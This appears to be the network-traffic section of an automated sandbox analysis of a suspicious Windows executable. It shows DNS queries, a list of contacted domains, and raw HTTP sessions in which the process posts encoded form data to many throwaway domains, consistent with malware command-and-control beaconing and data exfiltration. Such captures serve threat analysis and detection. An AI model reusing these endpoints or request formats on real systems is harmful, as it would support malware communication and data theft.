                                                              Sep 12, 2024 15:07:23.522069931 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522080898 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:07:23.522084951 CEST804976991.184.0.200192.168.2.4
                                                              Sep 12, 2024 15:08:38.266628981 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:38.266705990 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:38.280320883 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:38.285274982 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:38.741099119 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:38.741158962 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:39.788501024 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:39.793463945 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.807609081 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:40.812591076 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.812690020 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:40.824382067 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:40.829307079 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829318047 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829327106 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829377890 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829394102 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829476118 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829484940 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829519033 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829529047 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:42.214108944 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:42.214170933 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:42.335201025 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:42.340548038 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:43.356921911 CEST4979080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:43.361944914 CEST80497903.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:43.362076044 CEST4979080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:43.369678020 CEST4979080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:43.374630928 CEST80497903.33.130.190192.168.2.4
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 12, 2024 15:05:29.315604925 CEST6477253192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:05:30.319345951 CEST6477253192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:05:30.759830952 CEST53647721.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:05:30.759849072 CEST53647721.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:05:46.699390888 CEST5979853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:05:46.732034922 CEST53597981.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:00.230356932 CEST5956953192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:00.723598957 CEST53595691.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:14.197856903 CEST5505853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:14.212754965 CEST53550581.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:27.349145889 CEST5696053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:27.781498909 CEST53569601.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:41.224716902 CEST6138153192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:41.481323004 CEST53613811.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:54.604335070 CEST5657853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:54.636746883 CEST53565781.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:07.776221037 CEST6090053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:08.772476912 CEST6090053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:09.788156033 CEST6090053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:10.245091915 CEST53609001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:10.245115995 CEST53609001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:10.245125055 CEST53609001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:13.289899111 CEST5012053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:13.301229954 CEST53501201.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:18.307971001 CEST5731053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:18.325428009 CEST53573101.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:31.697649002 CEST5459253192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:31.880407095 CEST53545921.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:45.762868881 CEST5570953192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:46.241389990 CEST53557091.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:00.543067932 CEST5810053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:00.579713106 CEST53581001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:13.808892965 CEST5489053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:14.059242964 CEST53548901.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:22.123928070 CEST5610853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:22.174263954 CEST53561081.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:35.685852051 CEST6285853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:35.705642939 CEST53628581.1.1.1192.168.2.4
                                                              • www.jz07259dkijw.cloud
                                                              • www.academy-training.xyz
                                                              • www.fslab.tech
                                                              • www.vip66.zone
                                                              • www.lyxor.top
                                                              • www.unveiled.digital
                                                              • www.cake11298.online
                                                              • www.jobworklanka.online
                                                              • www.shipincheshi.skin
                                                              • www.sssqqq07-22.fun
                                                              • www.justlivn.net
                                                              • www.healtheduction.site
                                                              • www.globyglen.info
                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              0 | 192.168.2.4 | 49741 | 43.135.99.21 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:05:30.788381100 CEST | 437 | OUT | GET /yubh/?3tV=MGGAmHlvP++E3KpIg/FvL8i1JT0OgWxwxFcygqL2UA5R59sdx989XYnZ+w7o4wVQKi3RHCwbh3FXDB4APLYG/bTnAIRthbjQ9IlTiulES96X0xboBN3l7cI=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.jz07259dkijw.cloud
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:05:31.654726028 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:05:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.4 | 49742 | 79.125.89.83 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:05:46.756665945 CEST | 716 | OUT | POST /1ki5/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              Origin: http://www.academy-training.xyz
                                                              Referer: http://www.academy-training.xyz/1ki5/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=tuqK2VznLxQTMqY2C5JkVflhTLQpzHFFJM0scAsw8gVjuBhDxAvIDE+7RQ6gfOXApYS8rYrItlm3An8bwqBFJy454FCZXALw5gqdZFUyTwp/Ns52aEuDAkSYt0SfrfwXackVRXqAHqiyvTjeN9g71+2zP3MgqjNDD4kQhif8VK2m2Z6qD/NfW2R5e6emy0ye4g==
                                                              Sep 12, 2024 15:05:47.701035023 CEST | 488 | IN | HTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip
                                                              Sep 12, 2024 15:05:47.701590061 CEST | 488 | IN | HTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.4 | 49743 | 79.125.89.83 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:05:49.319444895 CEST | 736 | OUT | POST /1ki5/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              Origin: http://www.academy-training.xyz
                                                              Referer: http://www.academy-training.xyz/1ki5/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=tuqK2VznLxQTNPQ2AahkT/liN7Qpl3FBJNIscCB98yxjugRDwBvICE+7JA6lQuWtpYfBrcvItkC3AnMbwZ5CGC47yVCbTALw5gqdZFQUTwx/OYF2ZmKANESbkUSfvfwLackjRSzlHpayvTTeNoM4sO21SnNIpW9IOYxHsEbDVavC6/rwSOsIE21KD9XS/3PXjqOww6+z3W7QJzV+1O/TiIE=
                                                              Sep 12, 2024 15:05:49.943836927 CEST | 488 | IN | HTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.4 | 49744 | 79.125.89.83 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:05:51.871735096 CEST | 10818 | OUT | POST /1ki5/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              Origin: http://www.academy-training.xyz
                                                              Referer: http://www.academy-training.xyz/1ki5/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:05:52.576183081 CEST | 488 | IN | HTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:52 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.4 | 49745 | 79.125.89.83 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:05:54.581515074 CEST | 439 | OUT | GET /1ki5/?3tV=gsCq1lWJF1dgPZoYALsPcNVJYLoWokZlTtBhbiV8szE8yhkYsHvmTVOKeDfgQfnx9IrMke6/s2GfQFtZ1s1QNRcJqVfOe3H7gjz1UwsXUQ8sNONuaUThKkQ=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:05:55.205617905 CEST | 607 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:05:55 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Data Ascii: 12c<h2>Not Found</h2><p class="error"> <strong>Error: </strong> The requested address <strong>'/1ki5/?3tV=gsCq1lWJF1dgPZoYALsPcNVJYLoWokZlTtBhbiV8szE8yhkYsHvmTVOKeDfgQfnx9IrMke6/s2GfQFtZ1s1QNRcJqVfOe3H7gjz1UwsXUQ8sNONuaUThKkQ=&amp;IhkTb=xPfHG0o8kZI8'</strong> was not found on this server.</p>0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.4 | 49747 | 160.251.148.115 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:00.747618914 CEST | 686 | OUT | POST /5jwl/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              Origin: http://www.fslab.tech
                                                              Referer: http://www.fslab.tech/5jwl/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=bgC6P8BVHG3MYqJz+Cb15VZNvkGU0qJXiR/63sWueQBxWjwznZp2HiASxsZjbnJ1j2SEjEz52oHmXtYsr3RA7ZcYosadEsfJe9WWviQp3B++SFHmaNqmUPS6JYXWgpFCVlZoP5bxan9i8XjWJydrx4DWRD85RjZ66aYMba2//8qMNWi4n1GcflMipHVvjC8rLA==
                                                              Sep 12, 2024 15:06:01.557938099 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:01 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.4 | 49748 | 160.251.148.115 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:03.292758942 CEST | 706 | OUT | POST /5jwl/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              Origin: http://www.fslab.tech
                                                              Referer: http://www.fslab.tech/5jwl/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=bgC6P8BVHG3MYK5z7hz11lZOlEGUt6IciRz63p2+djlxYm0zmYp2EiAS5MZmG3J8j2e2jA352sXmXsosqA9DhpcWkMaDKMfJe9WWvjgX3BW+S1XmasqldvSlZIXWkpFeVlZaP7ukalFi8SHWJDdo74DQOT98eiYP84JDabiNw47rBwzi2EnLNloR0AcbuBBiQE3AJGQVg5m52DR5IgdkOM0=
                                                              Sep 12, 2024 15:06:04.084152937 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:03 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.4 | 49749 | 160.251.148.115 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:05.844846010 CEST | 10788 | OUT | POST /5jwl/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              Origin: http://www.fslab.tech
                                                              Referer: http://www.fslab.tech/5jwl/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:06.832684994 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:06 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.4 | 49750 | 160.251.148.115 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:08.382653952 CEST | 429 | OUT | GET /5jwl/?3tV=WiqaMLg9GlvLXaJn7h+mylxer0KY04sj1yDW0eaYUTp/DgBuxfteLRta+sEBNgYjuWmWpmmo3drGW8kplXtIxb0p1+mOEbGDGuu9pjk/4w3rZz7uLvbccNY=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:09.187525988 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:09 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Content-Length: 196
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.4 | 49751 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:14.231529951 CEST | 686 | OUT | POST /ymla/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              Origin: http://www.vip66.zone
                                                              Referer: http://www.vip66.zone/ymla/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=MtCnPjBKXHm4QUkpY+3wS92cgXuq1l933A1tNp2zOVE+sO8JKCNRNImvgXWxJzJwOjMKkOtAN/Bkto3LXzfF/zYZ6/LwAvorHpy5u1Sv2dY+dtkuQZpD2CCoh9eN5tmq9JJrW2bu4Xa9BQG2MJD7cSqFNvK5COcZsE4Ym5fPBDscDqsYlzHpIukBZ/7HFMwVeQ==


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:16.786643982 CEST | 706 | OUT | POST /ymla/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              Origin: http://www.vip66.zone
                                                              Referer: http://www.vip66.zone/ymla/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=MtCnPjBKXHm4CH8pU9fwVd2Tu3uq7F9z3H9tNtOjOmg+trAJYDNRMImv5nWoHTJ5Oiw4kPBAN89kts7LXg3C/jYfyfLId/orHpy5u1HA2dQ+d8UuR4pM/iCrodeNo9mu9JJJW33X4Re9BUO2d9X8HCqDSfL+GcMQkmZD4bzVBmIlCs9C0Cm+auAyE4yzIPNcFQGDdCVTBO9hSV7roNRVyuo=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.4 | 49753 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:19.327594995 CEST | 10788 | OUT | POST /ymla/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              Origin: http://www.vip66.zone
                                                              Referer: http://www.vip66.zone/ymla/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.4 | 49754 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:21.866998911 CEST | 429 | OUT | GET /ymla/?3tV=BvqHMV0nWlC/dF1qQ9SGd92esk2/yxlmtXJ+OaeVO1Q20dRfY2N3KYLrsWHVHDovdhcIqetDFv1Luq7dPE3I+iALpNHIcfNrfKqLui+R/P1jGO4yN6sj+Bs=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:22.321814060 CEST | 398 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Thu, 12 Sep 2024 13:06:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3tV=BvqHMV0nWlC/dF1qQ9SGd92esk2/yxlmtXJ+OaeVO1Q20dRfY2N3KYLrsWHVHDovdhcIqetDFv1Luq7dPE3I+iALpNHIcfNrfKqLui+R/P1jGO4yN6sj+Bs=&IhkTb=xPfHG0o8kZI8"}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.4 | 49755 | 203.161.43.228 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:27.802988052 CEST | 683 | OUT | POST /top4/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              Origin: http://www.lyxor.top
                                                              Referer: http://www.lyxor.top/top4/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=0YfBXeJgZU4NKW2LUJDmx3Cb8upIO/MkPE31ok1ZIMYfCv/OHzA2hwNg+oeBP42RmuNYaAB8195jOnv4SUOMSP+/wny3ixzYTQo+8DroSU4AY2pHuYCkmKtICUt1tRKbwiMF9sRSDW2emKxi3+XLtYOHENqIkqURixSNucI/xWWpGsaYU72VUnlqAjk8N0rBOg==
